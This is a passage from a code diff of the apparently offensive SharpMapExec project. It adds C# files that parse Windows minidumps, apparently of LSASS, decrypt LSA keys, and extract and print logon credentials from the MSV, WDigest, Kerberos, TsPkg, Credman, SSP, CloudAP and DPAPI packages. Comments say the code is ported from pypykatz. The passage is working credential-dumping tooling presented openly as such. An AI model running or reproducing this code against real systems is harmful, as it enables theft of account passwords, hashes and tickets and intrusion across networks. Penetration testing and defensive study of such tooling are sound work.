29	+	public long Buffer;
30	+	}
31	+
32	+	[StructLayout(LayoutKind.Sequential)]
33	+	public struct LUID_AND_ATTRIBUTES
34	+	{
35	+	public LUID Luid;
36	+	public uint Attributes;
37	+	}
38	+
39	+	[StructLayout(LayoutKind.Sequential)]
40	+	public struct LUID
41	+	{
42	+	public uint LowPart;
43	+	public int HighPart;
44	+	}
45	+
46	+	[DllImport("advapi32", CharSet = CharSet.Auto, SetLastError = true)]
47	+	private static extern bool ConvertSidToStringSid(
48	+	[MarshalAs(UnmanagedType.LPArray)] byte[] pSID, out IntPtr ptrSid);
49	+
50	+	public static DateTime ToDateTime(FILETIME time)
51	+	{
52	+	var fileTime = ((long)time.dwHighDateTime << 32) \| (uint)time.dwLowDateTime;
53	+
54	+	try
55	+	{
56	+	return DateTime.FromFileTime(fileTime);
57	+	}
58	+	catch
59	+	{
60	+	return DateTime.FromFileTime(0xFFFFFFFF);
61	+	}
62	+	}
63	+
64	+	public static List<long> find_all_global(BinaryReader fileBinaryReader, byte[] pattern, byte[] allocationprotect = null)
65	+	{
66	+	List<long> list = new List<long>();
67	+	if (allocationprotect == null)
68	+	allocationprotect = new byte[] { 0x04 };
69	+
70	+	fileBinaryReader.BaseStream.Seek(0, 0);
71	+	byte[] data = fileBinaryReader.ReadBytes((int)fileBinaryReader.BaseStream.Length);
72	+	list = AllPatternAt(data, pattern);
73	+	return list;
74	+	}
75	+
76	+	//https://github.com/skelsec/pypykatz/blob/bd1054d1aa948133a697a1dfcb57a5c6463be41a/pypykatz/lsadecryptor/package_commons.py#L64
77	+	public static long find_signature(Program.MiniDump minidump, string module_name, byte[] signature)
78	+	{
79	+	return find_in_module(minidump, module_name, signature);
80	+	}
81	+
82	+	//https://github.com/skelsec/minidump/blob/96d6b64dba679df14f5f78c64c3a045be8c4f1f1/minidump/minidumpreader.py#L268
83	+	public static long find_in_module(Program.MiniDump minidump, string module_name, byte[] pattern, bool find_first = false, bool reverse = false)
84	+	{
85	+	return search_module(minidump, module_name, pattern, find_first = find_first, reverse = reverse);
86	+	}
87	+
88	+	//https://github.com/skelsec/minidump/blob/96d6b64dba679df14f5f78c64c3a045be8c4f1f1/minidump/minidumpreader.py#L323
89	+	public static long search_module(Program.MiniDump minidump, string module_name, byte[] pattern, bool find_first = false, bool reverse = false, int chunksize = (10 * 1024))
90	+	{
91	+	long pos = minidump.fileBinaryReader.BaseStream.Position;
92	+	ModuleList.MinidumpModule mod = get_module_by_name(module_name, minidump.modules);
93	+	List<MinidumpMemory.MinidumpMemorySegment> memory_segments = new List<MinidumpMemory.MinidumpMemorySegment>();
94	+	bool is_fulldump;
95	+	if (minidump.sysinfo.ProcessorArchitecture == SystemInfo.PROCESSOR_ARCHITECTURE.AMD64)
96	+	{
97	+	memory_segments = minidump.memory_segments_64.memory_segments;
98	+	is_fulldump = true;
99	+	}
100	+	else
101	+	{
102	+	memory_segments = minidump.memory_segments.memory_segments;
103	+	is_fulldump = false;
104	+	}
105	+
106	+	byte[] needles = new byte[] { };
107	+	foreach (MinidumpMemory.MinidumpMemorySegment ms in memory_segments)
108	+	{
109	+	if (mod.baseaddress <= ms.start_virtual_address && ms.start_virtual_address <= mod.endaddress)
110	+	{
111	+	minidump.fileBinaryReader.BaseStream.Seek(ms.start_file_address, 0);
112	+	byte[] data = minidump.fileBinaryReader.ReadBytes((int)ms.size);
113	+	minidump.fileBinaryReader.BaseStream.Seek(pos, 0);
114	+	int offset = PatternAt(data, pattern);
115	+	if (offset != -1)
116	+	{
117	+	return (ms.start_file_address + offset);
118	+	}
119	+	}
120	+	}
121	+
122	+	return 0;
123	+	}
124	+
125	+	public static long Rva2offset(Program.MiniDump minidump, long virutal_address)
126	+	{
127	+	List<MinidumpMemory.MinidumpMemorySegment> memory_segments = new List<MinidumpMemory.MinidumpMemorySegment>();
128	+	bool is_fulldump;
129	+	if (minidump.sysinfo.ProcessorArchitecture == SystemInfo.PROCESSOR_ARCHITECTURE.AMD64)
130	+	{
131	+	memory_segments = minidump.memory_segments_64.memory_segments;
132	+	is_fulldump = true;
133	+	}
134	+	else
135	+	{
136	+	memory_segments = minidump.memory_segments.memory_segments;
137	+	is_fulldump = false;
138	+	}
139	+
140	+	foreach (MinidumpMemory.MinidumpMemorySegment ms in memory_segments)
141	+	{
142	+	if (ms.start_virtual_address <= (long)virutal_address && ms.end_virtual_address >= (long)virutal_address)
143	+	{
144	+	if (ms.start_virtual_address < (long)virutal_address)
145	+	{
146	+	int offset = (int)(virutal_address - (long)ms.start_virtual_address);
147	+	return (long)(ms.start_file_address + (long)offset);
148	+	}
149	+	return (long)ms.start_file_address;
150	+	}
151	+	}
152	+
153	+	return 0;
154	+	}
155	+
156	+	public static string ByteArrayToString(byte[] ba)
157	+	{
158	+	StringBuilder hex = new StringBuilder(ba.Length * 2);
159	+	foreach (byte b in ba)
160	+	hex.AppendFormat("0x{0:x2} ", b);
161	+	return hex.ToString();
162	+	}
163	+
164	+	public static int PatternAt(byte[] src, byte[] pattern)
165	+	{
166	+	int maxFirstCharSlot = src.Length - pattern.Length + 1;
167	+	for (int i = 0; i < maxFirstCharSlot; i++)
168	+	{
169	+	if (src[i] != pattern[0]) // compare only first byte
170	+	continue;
171	+
172	+	// found a match on first byte, now try to match rest of the pattern
173	+	for (int j = pattern.Length - 1; j >= 1; j--)
174	+	{
175	+	if (src[i + j] != pattern[j]) break;
176	+	if (j == 1) return i;
177	+	}
178	+	}
179	+	return -1;
180	+	}
181	+
182	+	public static List<long> AllPatternAt(byte[] src, byte[] pattern)
183	+	{
184	+	List<long> list = new List<long>();
185	+	int maxFirstCharSlot = src.Length - pattern.Length + 1;
186	+	for (int i = 0; i < maxFirstCharSlot; i++)
187	+	{
188	+	if (src[i] != pattern[0]) // compare only first byte
189	+	continue;
190	+
191	+	// found a match on first byte, now try to match rest of the pattern
192	+	for (int j = pattern.Length - 1; j >= 1; j--)
193	+	{
194	+	if (src[i + j] != pattern[j]) break;
195	+	if (j == 1) list.Add(i);
196	+	}
197	+	}
198	+	return list;
199	+	}
200	+
201	+	//https://github.com/skelsec/minidump/blob/96d6b64dba679df14f5f78c64c3a045be8c4f1f1/minidump/minidumpreader.py#L311
202	+	public static ModuleList.MinidumpModule get_module_by_name(string module_name, List<ModuleList.MinidumpModule> modules)
203	+	{
204	+	return modules.FirstOrDefault(item => item.name.Contains(module_name));
205	+	}
206	+
207	+	//https://github.com/skelsec/pypykatz/blob/bd1054d1aa948133a697a1dfcb57a5c6463be41a/pypykatz/commons/common.py#L168
208	+	public static ulong get_ptr_with_offset(BinaryReader fileBinaryReader, long pos, SystemInfo.MINIDUMP_SYSTEM_INFO sysinfo)
209	+	{
210	+	if (sysinfo.ProcessorArchitecture == SystemInfo.PROCESSOR_ARCHITECTURE.AMD64)
211	+	{
212	+	fileBinaryReader.BaseStream.Seek(pos, SeekOrigin.Begin);
213	+	UInt32 ptr = Minidump.Helpers.ReadUInt32(fileBinaryReader);
214	+	return (ulong)(pos + 4 + ptr);
215	+	}
216	+	else
217	+	{
218	+	fileBinaryReader.BaseStream.Seek(pos, SeekOrigin.Begin);
219	+	UInt16 ptr = Minidump.Helpers.ReadUInt16(fileBinaryReader);
220	+	return ptr;
221	+	}
222	+	}
223	+
224	+	//https://github.com/skelsec/pypykatz/blob/bd1054d1aa948133a697a1dfcb57a5c6463be41a/pypykatz/commons/common.py#L162
225	+	public static ulong get_ptr(BinaryReader fileBinaryReader, long pos, SystemInfo.MINIDUMP_SYSTEM_INFO sysinfo)
226	+	{
227	+	fileBinaryReader.BaseStream.Seek(pos, 0);
228	+	if (sysinfo.ProcessorArchitecture == SystemInfo.PROCESSOR_ARCHITECTURE.AMD64)
229	+	{
230	+	UInt32 ptr = Minidump.Helpers.ReadUInt32(fileBinaryReader);
231	+	return (ulong)ptr;
232	+	}
233	+	else
234	+	{
235	+	UInt16 ptr = Minidump.Helpers.ReadUInt16(fileBinaryReader);
236	+	return (ulong)ptr;
237	+	}
238	+	}
239	+
240	+	public static T ReadStruct<T>(byte[] array) where T : struct
241	+	{
242	+	var handle = GCHandle.Alloc(array, GCHandleType.Pinned);
243	+	var mystruct = (T)Marshal.PtrToStructure(handle.AddrOfPinnedObject(), typeof(T));
244	+	handle.Free();
245	+
246	+	return mystruct;
247	+	}
248	+
249	+	public static string ExtractSid(Program.MiniDump minidump, long pSid)
250	+	{
251	+	byte nbAuth;
252	+	int sizeSid;
253	+
254	+	var pSidInt = Minidump.Helpers.ReadInt64(minidump.fileBinaryReader, pSid);
255	+	minidump.fileBinaryReader.BaseStream.Seek(Rva2offset(minidump, pSidInt) + 8, 0);
256	+	var nbAuth_b = minidump.fileBinaryReader.ReadBytes(1);
257	+	nbAuth = nbAuth_b[0];
258	+	sizeSid = 4 * nbAuth + 6 + 1 + 1;
259	+
260	+	minidump.fileBinaryReader.BaseStream.Seek(Rva2offset(minidump, pSidInt), 0);
261	+	var sid_b = minidump.fileBinaryReader.ReadBytes(sizeSid);
262	+
263	+	ConvertSidToStringSid(sid_b, out IntPtr ptrSid);
264	+
265	+	return Marshal.PtrToStringAuto(ptrSid);
266	+	}
267	+
268	+	public static UNICODE_STRING ExtractUnicodeString(BinaryReader fileStreamReader)
269	+	{
270	+	UNICODE_STRING str;
271	+
272	+	byte[] strBytes = fileStreamReader.ReadBytes(Marshal.SizeOf(typeof(UNICODE_STRING)));
273	+	str = ReadStruct<UNICODE_STRING>(strBytes);
274	+
275	+	return str;
276	+	}
277	+
278	+	public static string ExtractUnicodeStringString(Program.MiniDump minidump, UNICODE_STRING str)
279	+	{
280	+	if (str.MaximumLength == 0) return null;
281	+
282	+	minidump.fileBinaryReader.BaseStream.Seek(Helpers.Rva2offset(minidump, str.Buffer), 0);
283	+	byte[] resultBytes = minidump.fileBinaryReader.ReadBytes(str.MaximumLength);
284	+
285	+	var encoder = new UnicodeEncoding(false, false, true);
286	+	try
287	+	{
288	+	return encoder.GetString(resultBytes);
289	+	}
290	+	catch (Exception)
291	+	{
292	+	return PrintHexBytes(resultBytes);
293	+	}
294	+	}
295	+
296	+	public static string PrintHexBytes(byte[] byteArray)
297	+	{
298	+	var res = new StringBuilder(byteArray.Length * 3);
299	+	for (var i = 0; i < byteArray.Length; i++)
300	+	res.AppendFormat(NumberFormatInfo.InvariantInfo, "{0:x2} ", byteArray[i]);
301	+	return res.ToString();
302	+	}
303	+
304	+	public static int FieldOffset<T>(string fieldName)
305	+	{
306	+	return Marshal.OffsetOf(typeof(T), fieldName).ToInt32();
307	+	}
308	+
309	+	public static int StructFieldOffset(Type s, string field)
310	+	{
311	+	var ex = typeof(Helpers);
312	+	var mi = ex.GetMethod("FieldOffset");
313	+	var miConstructed = mi.MakeGenericMethod(s);
314	+	object[] args = { field };
315	+	return (int)miConstructed.Invoke(null, args);
316	+	}
317	+
318	+	public static UNICODE_STRING ExtractUnicodeString(BinaryReader fileStreamReader, long offset)
319	+	{
320	+	UNICODE_STRING str;
321	+	fileStreamReader.BaseStream.Seek(offset, 0);
322	+	byte[] strBytes = fileStreamReader.ReadBytes(Marshal.SizeOf(typeof(UNICODE_STRING)));
323	+	str = ReadStruct<UNICODE_STRING>(strBytes);
324	+
325	+	return str;
326	+	}
327	+
328	+	public static byte[] GetBytes(byte[] source, long startindex, int lenght)
329	+	{
330	+	var resBytes = new byte[lenght];
331	+	Array.Copy(source, startindex, resBytes, 0, resBytes.Length);
332	+	return resBytes;
333	+	}
334	+
335	+	public static string PrintHashBytes(byte[] byteArray)
336	+	{
337	+	if (byteArray == null)
338	+	return string.Empty;
339	+
340	+	var res = new StringBuilder(byteArray.Length * 2);
341	+	for (var i = 0; i < byteArray.Length; i++)
342	+	res.AppendFormat(NumberFormatInfo.InvariantInfo, "{0:x2}", byteArray[i]);
343	+	return res.ToString();
344	+	}
345	+
346	+	public static string ExtractANSIStringString(Program.MiniDump minidump, UNICODE_STRING str)
347	+	{
348	+	if (str.MaximumLength == 0) return null;
349	+
350	+	minidump.fileBinaryReader.BaseStream.Seek(Helpers.Rva2offset(minidump, str.Buffer), 0);
351	+	byte[] resultBytes = minidump.fileBinaryReader.ReadBytes(str.MaximumLength);
352	+	var pinnedArray = GCHandle.Alloc(resultBytes, GCHandleType.Pinned);
353	+	var tmp_p = pinnedArray.AddrOfPinnedObject();
354	+	var result = Marshal.PtrToStringAnsi(tmp_p);
355	+	pinnedArray.Free();
356	+
357	+	return result;
358	+	}
359	+
360	+	public static string get_from_rva(int rva, BinaryReader fileBinaryReader)
361	+	{
362	+	long pos = fileBinaryReader.BaseStream.Position;
363	+	fileBinaryReader.BaseStream.Seek(rva, 0);
364	+	UInt32 length = ReadUInt32(fileBinaryReader);
365	+	byte[] data = fileBinaryReader.ReadBytes((int)length);
366	+	////Array.Reverse(data);
367	+	fileBinaryReader.BaseStream.Seek(pos, 0);
368	+	string name = Encoding.Unicode.GetString(data);
369	+	return name;
370	+	}
371	+
372	+	public static void PrintProperties(object myObj, string header = "", int offset = 0)
373	+	{
374	+	string trail = String.Concat(Enumerable.Repeat(" ", offset));
375	+
376	+	if (!string.IsNullOrEmpty(header))
377	+	Console.WriteLine(header);
378	+
379	+	foreach (var prop in myObj.GetType().GetProperties())
380	+	{
381	+	try
382	+	{
383	+	if (!string.IsNullOrEmpty((string)(prop.GetValue(myObj, null))))
384	+	Console.WriteLine(trail + prop.Name + ": " + prop.GetValue(myObj, null));
385	+	}
386	+	catch (Exception e)
387	+	{
388	+	Console.WriteLine(trail + prop.Name + ": " + prop.GetValue(myObj, null));
389	+	}
390	+	}
391	+
392	+	foreach (var field in myObj.GetType().GetFields())
393	+	{
394	+	try
395	+	{
396	+	if (!string.IsNullOrEmpty((string)field.GetValue(myObj)))
397	+	Console.WriteLine(trail + field.Name + ": " + field.GetValue(myObj));
398	+	}
399	+	catch (Exception e)
400	+	{
401	+	Console.WriteLine(trail + field.Name + ": " + field.GetValue(myObj));
402	+	}
403	+	}
404	+	}
405	+
406	+	public static string ReadString(BinaryReader fileBinaryReader, int Length)
407	+	{
408	+	var data = fileBinaryReader.ReadBytes(Length);
409	+	Array.Reverse(data);
410	+	return Encoding.Unicode.GetString(data);
411	+	}
412	+
413	+	public static Int16 ReadInt16(BinaryReader fileBinaryReader)
414	+	{
415	+	var data = fileBinaryReader.ReadBytes(2);
416	+	//Array.Reverse(data);
417	+	return BitConverter.ToInt16(data, 0);
418	+	}
419	+
420	+	public static Int32 ReadInt32(BinaryReader fileBinaryReader)
421	+	{
422	+	var data = fileBinaryReader.ReadBytes(4);
423	+	//Array.Reverse(data);
424	+	return BitConverter.ToInt32(data, 0);
425	+	}
426	+
427	+	public static Int64 ReadInt64(BinaryReader fileBinaryReader)
428	+	{
429	+	var data = fileBinaryReader.ReadBytes(8);
430	+	//Array.Reverse(data);
431	+	return BitConverter.ToInt64(data, 0);
432	+	}
433	+
434	+	public static uint ReadInt8(BinaryReader fileBinaryReader)
435	+	{
436	+	byte data = fileBinaryReader.ReadBytes(1)[0];
437	+	//Array.Reverse(data);
438	+	return data;
439	+	}
440	+
441	+	public static UInt16 ReadUInt16(BinaryReader fileBinaryReader)
442	+	{
443	+	var data = fileBinaryReader.ReadBytes(2);
444	+	//Array.Reverse(data);
445	+	return BitConverter.ToUInt16(data, 0);
446	+	}
447	+
448	+	public static UInt32 ReadUInt32(BinaryReader fileBinaryReader)
449	+	{
450	+	var data = fileBinaryReader.ReadBytes(4);
451	+	//Array.Reverse(data);
452	+	return BitConverter.ToUInt32(data, 0);
453	+	}
454	+
455	+	public static UInt64 ReadUInt64(BinaryReader fileBinaryReader)
456	+	{
457	+	var data = fileBinaryReader.ReadBytes(8);
458	+	//Array.Reverse(data);
459	+	return BitConverter.ToUInt64(data, 0);
460	+	}
461	+
462	+	public static Int16 ReadInt16(BinaryReader fileBinaryReader, long offset)
463	+	{
464	+	fileBinaryReader.BaseStream.Seek(offset, 0);
465	+	var data = fileBinaryReader.ReadBytes(2);
466	+	//Array.Reverse(data);
467	+	return BitConverter.ToInt16(data, 0);
468	+	}
469	+
470	+	public static Int32 ReadInt32(BinaryReader fileBinaryReader, long offset)
471	+	{
472	+	fileBinaryReader.BaseStream.Seek(offset, 0);
473	+	var data = fileBinaryReader.ReadBytes(4);
474	+	//Array.Reverse(data);
475	+	return BitConverter.ToInt32(data, 0);
476	+	}
477	+
478	+	public static Int64 ReadInt64(BinaryReader fileBinaryReader, long offset)
479	+	{
480	+	fileBinaryReader.BaseStream.Seek(offset, 0);
481	+	var data = fileBinaryReader.ReadBytes(8);
482	+	//Array.Reverse(data);
483	+	return BitConverter.ToInt64(data, 0);
484	+	}
485	+
486	+	public static uint ReadInt8(BinaryReader fileBinaryReader, long offset)
487	+	{
488	+	fileBinaryReader.BaseStream.Seek(offset, 0);
489	+	byte data = fileBinaryReader.ReadBytes(1)[0];
490	+	//Array.Reverse(data);
491	+	return data;
492	+	}
493	+
494	+	public static UInt16 ReadUInt16(BinaryReader fileBinaryReader, long offset)
495	+	{
496	+	fileBinaryReader.BaseStream.Seek(offset, 0);
497	+	var data = fileBinaryReader.ReadBytes(2);
498	+	//Array.Reverse(data);
499	+	return BitConverter.ToUInt16(data, 0);
500	+	}
501	+
502	+	public static UInt32 ReadUInt32(BinaryReader fileBinaryReader, long offset)
503	+	{
504	+	fileBinaryReader.BaseStream.Seek(offset, 0);
505	+	var data = fileBinaryReader.ReadBytes(4);
506	+	//Array.Reverse(data);
507	+	return BitConverter.ToUInt32(data, 0);
508	+	}
509	+
510	+	public static UInt64 ReadUInt64(BinaryReader fileBinaryReader, long offset)
511	+	{
512	+	fileBinaryReader.BaseStream.Seek(offset, 0);
513	+	var data = fileBinaryReader.ReadBytes(8);
514	+	//Array.Reverse(data);
515	+	return BitConverter.ToUInt64(data, 0);
516	+	}
517	+
518	+	public static byte[] ReadBytes(BinaryReader fileBinaryReader, long offset, int length)
519	+	{
520	+	fileBinaryReader.BaseStream.Seek(offset, 0);
521	+	var data = fileBinaryReader.ReadBytes(length);
522	+	//Array.Reverse(data);
523	+	return data;
524	+	}
525	+	}
526	+	}

■ ■ ■ ■ ■ ■

SharpMapExec/Projects/MiniDump/Program.cs

1	+	using Minidump.Decryptor;
2	+	using Minidump.Streams;
3	+	using Minidump.Templates;
4	+	using System;
5	+	using System.Collections.Generic;
6	+	using System.IO;
7	+
8	+	namespace Minidump
9	+	{
10	+	public class Program
11	+	{
12	+	public struct MiniDump
13	+	{
14	+	public Header.MinidumpHeader header;
15	+	public SystemInfo.MINIDUMP_SYSTEM_INFO sysinfo;
16	+	public List<ModuleList.MinidumpModule> modules;
17	+	public MINIDUMP_MEMORY64.MinidumpMemory64List memory_segments_64;
18	+	public MINIDUMP_MEMORY86.MinidumpMemory86List memory_segments;
19	+	public BinaryReader fileBinaryReader;
20	+	public LsaDecryptor.LsaKeys lsakeys;
21	+	public List<Logon> logonlist;
22	+	public List<KerberosSessions.KerberosLogonItem> klogonlist;
23	+	}
24	+
25	+	public static void parse(byte[] bytes)
26	+	{
27	+
28	+	MiniDump minidump = new MiniDump();
29	+	using (BinaryReader fileBinaryReader = new BinaryReader(new MemoryStream(bytes)))
30	+	{
31	+	// parse header && streams
32	+	minidump.fileBinaryReader = fileBinaryReader;
33	+	minidump.header = Header.ParseHeader(minidump);
34	+	List<Streams.Directory.MINIDUMP_DIRECTORY> directories = Streams.Directory.ParseDirectory(minidump);
35	+	Parse.parseMM(ref minidump, directories);
36	+	//Helpers.PrintProperties(minidump.header);
37	+	//Helpers.PrintProperties(minidump.sysinfo);
38	+	//Helpers.PrintProperties(minidump.modules);
39	+	//Helpers.PrintProperties(minidump.MinidumpMemory64List);
40	+
41	+	minidump.sysinfo.msv_dll_timestamp = 0;
42	+	foreach (ModuleList.MinidumpModule mod in minidump.modules)
43	+	{
44	+	if (mod.name.Contains("lsasrv.dll"))
45	+	{
46	+	minidump.sysinfo.msv_dll_timestamp = (int)mod.timestamp;
47	+	break;
48	+	}
49	+	}
50	+
51	+	// parse lsa
52	+	minidump.lsakeys = LsaDecryptor.choose(minidump, lsaTemplate.get_template(minidump.sysinfo));
53	+	//Console.WriteLine(Helpers.ByteArrayToString(minidump.lsakeys.iv));
54	+	//Console.WriteLine(Helpers.ByteArrayToString(minidump.lsakeys.des_key));
55	+	//Console.WriteLine(Helpers.ByteArrayToString(minidump.lsakeys.aes_key));
56	+
57	+	// parse sessions
58	+	minidump.logonlist = LogonSessions.FindSessions(minidump, msv.get_template(minidump.sysinfo));
59	+	minidump.klogonlist = KerberosSessions.FindSessions(minidump, (kerberos.get_template(minidump.sysinfo)));
60	+
61	+	//parse credentials
62	+	try
63	+	{
64	+	Msv1_.FindCredentials(minidump, msv.get_template(minidump.sysinfo));
65	+	}
66	+	catch (Exception e)
67	+	{
68	+	Console.WriteLine($"MSV failed: {e.Message}");
69	+	}
70	+
71	+	try
72	+	{
73	+	WDigest_.FindCredentials(minidump, wdigest.get_template(minidump.sysinfo));
74	+	}
75	+	catch (Exception e)
76	+	{
77	+	Console.WriteLine($"WDigest failed: {e.Message}");
78	+	}
79	+
80	+	try
81	+	{
82	+	Kerberos_.FindCredentials(minidump, kerberos.get_template(minidump.sysinfo));
83	+	}
84	+	catch (Exception e)
85	+	{
86	+	Console.WriteLine($"Kerberos failed: {e.Message}");
87	+	}
88	+
89	+	try
90	+	{
91	+	Tspkg_.FindCredentials(minidump, tspkg.get_template(minidump.sysinfo));
92	+	}
93	+	catch (Exception e)
94	+	{
95	+	Console.WriteLine($"TsPkg failed: {e.Message}");
96	+	}
97	+
98	+	try
99	+	{
100	+	Credman_.FindCredentials(minidump, credman.get_template(minidump.sysinfo));
101	+	}
102	+	catch (Exception e)
103	+	{
104	+	Console.WriteLine($"Credman failed: {e.Message}");
105	+	}
106	+
107	+	try
108	+	{
109	+	Ssp_.FindCredentials(minidump, ssp.get_template(minidump.sysinfo));
110	+	}
111	+	catch (Exception e)
112	+	{
113	+	Console.WriteLine($"SSP failed: {e.Message}");
114	+	}
115	+
116	+	//try
117	+	//{
118	+	// LiveSsp_.FindCredentials(minidump, livessp.get_template(minidump.sysinfo));
119	+	//}
120	+	//catch (Exception e)
121	+	//{
122	+	// Console.WriteLine($"LiveSSP failed: {e.Message}");
123	+	//}
124	+
125	+	try
126	+	{
127	+	Cloudap_.FindCredentials(minidump, cloudap.get_template(minidump.sysinfo));
128	+	}
129	+	catch (Exception e)
130	+	{
131	+	Console.WriteLine($"CloudAP failed: {e.Message}");
132	+	}
133	+
134	+	try
135	+	{
136	+	Dpapi_.FindCredentials(minidump, dpapi.get_template(minidump.sysinfo));
137	+	}
138	+	catch (Exception e)
139	+	{
140	+	Console.WriteLine($"Dpapi failed: {e.Message}");
141	+	}
142	+
143	+	foreach (Logon log in minidump.logonlist)
144	+	{
145	+	try
146	+	{
147	+	if (log.Wdigest != null \|\| log.Msv != null \|\| log.Kerberos != null \|\| log.Tspkg != null \|\| log.Credman != null \|\| log.Ssp != null \|\| log.LiveSsp != null \|\| log.Dpapi != null \|\| log.Cloudap != null)
148	+	{
149	+	Console.WriteLine("=====================================================================");
150	+	//Helpers.PrintProperties(log);
151	+	Console.WriteLine($"[*] LogonId: {log.LogonId.HighPart}:{log.LogonId.LowPart}");
152	+	if (!string.IsNullOrEmpty(log.LogonType))
153	+	Console.WriteLine($"[*] LogonType: {log.LogonType}");
154	+	Console.WriteLine($"[*] Session: {log.Session}");
155	+	if(log.LogonTime.dwHighDateTime != 0)
156	+	Console.WriteLine($"[*] LogonTime: {Helpers.ToDateTime(log.LogonTime):yyyy-MM-dd HH:mm:ss}");
157	+	Console.WriteLine($"[*] UserName: {log.UserName}");
158	+	if (!string.IsNullOrEmpty(log.SID))
159	+	Console.WriteLine($"[*] SID: {log.SID}");
160	+	if (!string.IsNullOrEmpty(log.LogonDomain))
161	+	Console.WriteLine($"[*] LogonDomain: {log.LogonDomain}");
162	+	if(!string.IsNullOrEmpty(log.LogonServer))
163	+	Console.WriteLine($"[*] LogonServer: {log.LogonServer}");
164	+	}
165	+	if (log.Msv != null)
166	+	{
167	+	Helpers.PrintProperties(log.Msv, "[*] Msv", 4);
168	+	}
169	+	if (log.Kerberos != null)
170	+	{
171	+	Helpers.PrintProperties(log.Kerberos, "[*] Kerberos", 4);
172	+	}
173	+	if (log.Wdigest != null)
174	+	{
175	+	foreach (WDigest wd in log.Wdigest)
176	+	Helpers.PrintProperties(wd, "[*] Wdigest", 4);
177	+	}
178	+	if (log.Ssp != null)
179	+	{
180	+	foreach (Ssp s in log.Ssp)
181	+	Helpers.PrintProperties(s, "[*] Ssp", 4);
182	+	}
183	+	if (log.Tspkg != null)
184	+	{
185	+	foreach (Tspkg ts in log.Tspkg)
186	+	Helpers.PrintProperties(ts, "[*] TsPkg", 4);
187	+	}
188	+	if (log.Credman != null)
189	+	{
190	+	foreach (CredMan cm in log.Credman)
191	+	Helpers.PrintProperties(cm, "[*] CredMan", 4);
192	+	}
193	+	if (log.Dpapi != null)
194	+	{
195	+	foreach (Dpapi dpapi in log.Dpapi)
196	+	Helpers.PrintProperties(dpapi, "[*] Dpapi", 4);
197	+	}
198	+	if (log.Cloudap != null)
199	+	{
200	+	foreach (Cloudap cap in log.Cloudap)
201	+	Helpers.PrintProperties(cap, "[*] CloudAp", 4);
202	+	}
203	+	}
204	+	catch (Exception e)
205	+	{
206	+	Console.WriteLine($"{e.Message}");
207	+	}
208	+	}
209	+	}
210	+	}
211	+	}
212	+	}

■ ■ ■ ■ ■ ■

SharpMapExec/Projects/MiniDump/Streams/Directory.cs

1	+	using System;
2	+	using System.Collections.Generic;
3	+
4	+	namespace Minidump.Streams
5	+	{
6	+	public class Directory
7	+	{
8	+	public struct MINIDUMP_DIRECTORY
9	+	{
10	+	public MINIDUMP_STREAM_TYPE StreamType;
11	+	public uint Size;
12	+	public uint Offset;
13	+	}
14	+
15	+	[Flags]
16	+	public enum MINIDUMP_STREAM_TYPE
17	+	{
18	+	UnusedStream = 0,
19	+	ReservedStream0 = 1,
20	+	ReservedStream1 = 2,
21	+	ThreadListStream = 3,
22	+	ModuleListStream = 4,
23	+	MemoryListStream = 5,
24	+	ExceptionStream = 6,
25	+	SystemInfoStream = 7,
26	+	ThreadExListStream = 8,
27	+	Memory64ListStream = 9,
28	+	CommentStreamA = 10,
29	+	CommentStreamW = 11,
30	+	HandleDataStream = 12,
31	+	FunctionTableStream = 13,
32	+	UnloadedModuleListStream = 14,
33	+	MiscInfoStream = 15,
34	+	MemoryInfoListStream = 16,
35	+	ThreadInfoListStream = 17,
36	+	HandleOperationListStream = 18,
37	+	TokenStream = 19,
38	+	JavaScriptDataStream = 20,
39	+	SystemMemoryInfoStream = 21,
40	+	ProcessVmCountersStream = 22,
41	+	ThreadNamesStream = 24,
42	+	ceStreamNull = 25,
43	+	ceStreamSystemInfo = 26,
44	+	ceStreamException = 27,
45	+	ceStreamModuleList = 28,
46	+	ceStreamProcessList = 29,
47	+	ceStreamThreadList = 30,
48	+	ceStreamThreadContextList = 31,
49	+	ceStreamThreadCallStackList = 32,
50	+	ceStreamMemoryVirtualList = 33,
51	+	ceStreamMemoryPhysicalList = 34,
52	+	ceStreamBucketParameters = 35,
53	+	ceStreamProcessModuleMap = 36,
54	+	ceStreamDiagnosisList = 37,
55	+	LastReservedStream = 0xffff,
56	+	}
57	+
58	+	public static List<MINIDUMP_DIRECTORY> ParseDirectory(Program.MiniDump minidump)
59	+	{
60	+	List<MINIDUMP_DIRECTORY> directories = new List<Directory.MINIDUMP_DIRECTORY>();
61	+
62	+	for (int i = 0; i < (int)minidump.header.NumberOfStreams; i++)
63	+	{
64	+	minidump.fileBinaryReader.BaseStream.Seek(minidump.header.StreamDirectoryRva + i * 12, 0);
65	+	UInt32 raw_stream_type_value = Helpers.ReadUInt32(minidump.fileBinaryReader);
66	+	bool is_user_stream = (int)raw_stream_type_value > (int)MINIDUMP_STREAM_TYPE.LastReservedStream;
67	+	bool is_stream_supported = Enum.IsDefined(typeof(MINIDUMP_STREAM_TYPE), (int)raw_stream_type_value);
68	+	if (is_user_stream && !is_stream_supported)
69	+	{
70	+	continue;
71	+	}
72	+
73	+	MINIDUMP_DIRECTORY md = new MINIDUMP_DIRECTORY();
74	+	md.StreamType = (MINIDUMP_STREAM_TYPE)Enum.Parse(typeof(MINIDUMP_STREAM_TYPE),
75	+	Enum.GetName(typeof(MINIDUMP_STREAM_TYPE), (int)raw_stream_type_value)); // Enum.GetName(typeof(MINIDUMP_STREAM_TYPE), (int)raw_stream_type_value);
76	+	md.Size = Helpers.ReadUInt32(minidump.fileBinaryReader);
77	+	md.Offset = Helpers.ReadUInt32(minidump.fileBinaryReader);
78	+	directories.Add(md);
79	+	}
80	+
81	+	return directories;
82	+	}
83	+	}
84	+	}

■ ■ ■ ■ ■ ■

SharpMapExec/Projects/MiniDump/Streams/Header.cs

1	+	using System;
2	+
3	+	namespace Minidump.Streams
4	+	{
5	+	public class Header
6	+	{
7	+	public struct MinidumpHeader
8	+	{
9	+	public String Signature;
10	+	public UInt16 Version;
11	+	public UInt16 ImplementationVersion;
12	+	public UInt32 NumberOfStreams;
13	+	public UInt32 StreamDirectoryRva;
14	+	public UInt32 CheckSum;
15	+	public UInt32 Reserved;
16	+	public UInt32 TimeDateStamp;
17	+	public string Flags;
18	+	}
19	+
20	+	[Flags]
21	+	public enum MINIDUMP_TYPE
22	+	{
23	+	MiniDumpNormal = 0x00000000,
24	+	MiniDumpWithDataSegs = 0x00000001,
25	+	MiniDumpWithFullMemory = 0x00000002,
26	+	MiniDumpWithHandleData = 0x00000004,
27	+	MiniDumpFilterMemory = 0x00000008,
28	+	MiniDumpScanMemory = 0x00000010,
